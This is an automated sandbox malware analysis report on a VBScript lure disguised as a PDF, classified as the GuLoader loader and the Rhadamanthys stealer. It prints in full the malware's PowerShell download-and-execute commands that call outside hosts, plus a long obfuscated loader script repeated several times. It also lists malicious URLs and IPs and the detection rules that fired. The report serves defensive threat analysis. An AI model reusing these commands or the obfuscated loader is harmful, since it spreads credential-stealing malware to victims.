Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
List of required items and services.pdf.vbs

Overview

General Information

Sample name:List of required items and services.pdf.vbs
Analysis ID:1577817
MD5:ff72b1e0f5d3b97e35607d56fbad4822
SHA1:df3978221f7bc99d030b6fe4740fba6b82b9298d
SHA256:514de6a57036885af76574b16a93669699edd143fea8532a24491c7bfe004ffc
Tags:87-120-112-91vbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Dllhost Internet Connection
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6788 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 5812 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • WMIC.exe (PID: 2416 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De,mt Go arSp= u$UnAfds obMioAdl oialtane') ;cleavingly $Pastina;cleavingly (Symboltabeller 'BjS iTTaAsurFitT -StSE L EovE.oP,o Se4');cleavingly (Symboltabeller 'Go$NoGL lFlOPrb LAGalS : awBie Re .k IEkoN OdG U ,dKvfOvlSpUNoG.itTjePiRA NTyeD,smi=M,( ft.pe SsTrT - CpF.AKot hSp Fe$Mus TopeW,M ,N.kIV.NPlGV.SAlfPhu kLGrDCaT o)') ;cleavingly (Symboltabeller 'Sy$ Dg rL ao,mBB.aT Lst:deuT nChm .uArfSuF SlSne aSTr= i$ sgGlLSiO.abS,a Tl o: KaR LBeEUfTPaH MoPaP.rtIneU IEtsSk+Pe+No%Fl$G,V eA aU bExeKiNsafHuAUnbEkrB i nKSy.dycOvO uprN ,t') ;$Eliksirers=$Vaabenfabrik[$Unmuffles]}$Velfunderede=317450;$autoriserendes=28180;cleavingly (Symboltabeller ' w$PlGXyLAmO eBBlabol n:Mef nrFadZaiLsG MbMoY ogO gMieUdTB, Vi= U SegB,EbetCh-UoC uoVeNQuTB e,unF.t i Fi$P sAntAtEU MTen oiFoN SGSaSAffU,UMylInDNot');cleavingly (Symboltabeller 'Ud$opgSplCroPebHjaUdlMe: TE np HoWhc HhB.e N=Sy Vi[DeS,eyR sMatNee.mmFn.,pCRioInnRevReeSarP t ]Ca:Sn:K F arNao PmU B oa asRyeMi6B 4 aS BtIprRoi unAng D( a$.eF FrTid .i gPrb,yyAfgSug be Pt s)');cleavingly (Symboltabeller 'T.$ .g .lT.OInbEsaQul o: eFSpl KJ VL usBeGLrR,iS u D =Re D[ osHeYI sS TSkE mBa. yT.nED x Ct E. ae NReCReOEgdS I DN eG,e]H,:C.:R ATysB CNaislIQu.AdGP eB,TVesSaTElR ,I,enSygte( R$ WEHop moN.c .HDiEB )');cleavingly (Symboltabeller 'Fe$Hog .lUnO Fb ea FLOu:KoBKaARet rtC,aRaLCoineaFo=.b$ReFSulUnJ iL ksDeG ,RG S F. ps fuC.b ysAltKoR,iIP.nTyGLo(.o$ToVUneFuLdeFTaU SnG dHaESorAkEFaDFoERe, ,$Una lUigT o Vr eI Ps SEM RPeeBrn HdAse.rS,a)');cleavingly $Battalia;" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WINWORD.EXE (PID: 7120 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\rdc7di6ccs.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • powershell.exe (PID: 5232 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De,mt Go arSp= u$UnAfds obMioAdl oialtane') ;cleavingly $Pastina;cleavingly (Symboltabeller 'BjS iTTaAsurFitT -StSE L EovE.oP,o Se4');cleavingly (Symboltabeller 'Go$NoGL lFlOPrb LAGalS : awBie Re .k IEkoN OdG U ,dKvfOvlSpUNoG.itTjePiRA NTyeD,smi=M,( ft.pe SsTrT - CpF.AKot hSp Fe$Mus TopeW,M ,N.kIV.NPlGV.SAlfPhu kLGrDCaT o)') ;cleavingly (Symboltabeller 'Sy$ Dg rL ao,mBB.aT Lst:deuT nChm .uArfSuF SlSne aSTr= i$ sgGlLSiO.abS,a Tl o: KaR LBeEUfTPaH MoPaP.rtIneU IEtsSk+Pe+No%Fl$G,V eA aU bExeKiNsafHuAUnbEkrB i nKSy.dycOvO uprN ,t') ;$Eliksirers=$Vaabenfabrik[$Unmuffles]}$Velfunderede=317450;$autoriserendes=28180;cleavingly (Symboltabeller ' w$PlGXyLAmO eBBlabol n:Mef nrFadZaiLsG MbMoY ogO gMieUdTB, Vi= U SegB,EbetCh-UoC uoVeNQuTB e,unF.t i Fi$P sAntAtEU MTen oiFoN SGSaSAffU,UMylInDNot');cleavingly (Symboltabeller 'Ud$opgSplCroPebHjaUdlMe: TE np HoWhc HhB.e N=Sy Vi[DeS,eyR sMatNee.mmFn.,pCRioInnRevReeSarP t ]Ca:Sn:K F arNao PmU B oa asRyeMi6B 4 aS BtIprRoi unAng D( a$.eF FrTid .i gPrb,yyAfgSug be Pt s)');cleavingly (Symboltabeller 'T.$ .g .lT.OInbEsaQul o: eFSpl KJ VL usBeGLrR,iS u D =Re D[ osHeYI sS TSkE mBa. yT.nED x Ct E. ae NReCReOEgdS I DN eG,e]H,:C.:R ATysB CNaislIQu.AdGP eB,TVesSaTElR ,I,enSygte( R$ WEHop moN.c .HDiEB )');cleavingly (Symboltabeller 'Fe$Hog .lUnO Fb ea FLOu:KoBKaARet rtC,aRaLCoineaFo=.b$ReFSulUnJ iL ksDeG ,RG S F. ps fuC.b ysAltKoR,iIP.nTyGLo(.o$ToVUneFuLdeFTaU SnG dHaESorAkEFaDFoERe, ,$Una lUigT o Vr eI Ps SEM RPeeBrn HdAse.rS,a)');cleavingly $Battalia;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5228 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • svchost.exe (PID: 2188 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • svchost.exe (PID: 940 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • chrome.exe (PID: 1848 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chrEA6C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/df460fc7/4a1b3c1a" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2544 --field-trial-handle=2512,i,3131430340746137316,18275235593028859389,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • wmprph.exe (PID: 2180 cmdline: "C:\Program Files\Windows Media Player\wmprph.exe" MD5: B4298167D12E6AC4618518E0B6326802)
            • dllhost.exe (PID: 3548 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • svchost.exe (PID: 4888 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2206243160.0000000008870000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000013.00000003.2349020034.00000000247D0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000014.00000003.2350109419.0000000000760000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000013.00000003.2346049870.00000000004B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          0000000B.00000002.2184442269.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            19.3.msiexec.exe.247d0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              19.3.msiexec.exe.245b0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                20.3.svchost.exe.4f80000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  20.3.svchost.exe.4d60000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    19.3.msiexec.exe.247d0000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_6216.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi32_5232.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                        • 0xa1da:$b2: ::FromBase64String(
                        • 0x924e:$s1: -join
                        • 0x29fa:$s4: +=
                        • 0x2abc:$s4: +=
                        • 0x6ce3:$s4: +=
                        • 0x8e00:$s4: +=
                        • 0x90ea:$s4: +=
                        • 0x9230:$s4: +=
                        • 0x129a0:$s4: +=
                        • 0x12a20:$s4: +=
                        • 0x12ae6:$s4: +=
                        • 0x12b66:$s4: +=
                        • 0x12d3c:$s4: +=
                        • 0x12dc0:$s4: +=
                        • 0x9a7f:$e4: Get-WmiObject
                        • 0x9c6e:$e4: Get-Process
                        • 0x9cc6:$e4: Start-Process
                        • 0x1366c:$e4: Get-Process

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Potentially Suspicious PowerShell Child Processes
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6904, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs" , ProcessId: 5812, ProcessName: wscript.exe
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6904, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs" , ProcessId: 5812, ProcessName: wscript.exe
                        Sigma detected: Suspicious Invoke-WebRequest Execution
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6788, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', ProcessId: 6904, ProcessName: powershell.exe
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs", ProcessId: 6788, ProcessName: wscript.exe
                        Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                        Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6904, TargetFilename: C:\Users\Public\g8ix97hz.vbs
                        Sigma detected: Dllhost Internet Connection
                        Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 45.149.241.141, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 3548, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49943
                        Sigma detected: Msiexec Initiated Connection
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 202.71.109.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5228, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49809
                        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6904, TargetFilename: C:\Users\Public\g8ix97hz.vbs
                        Sigma detected: PowerShell Web Download
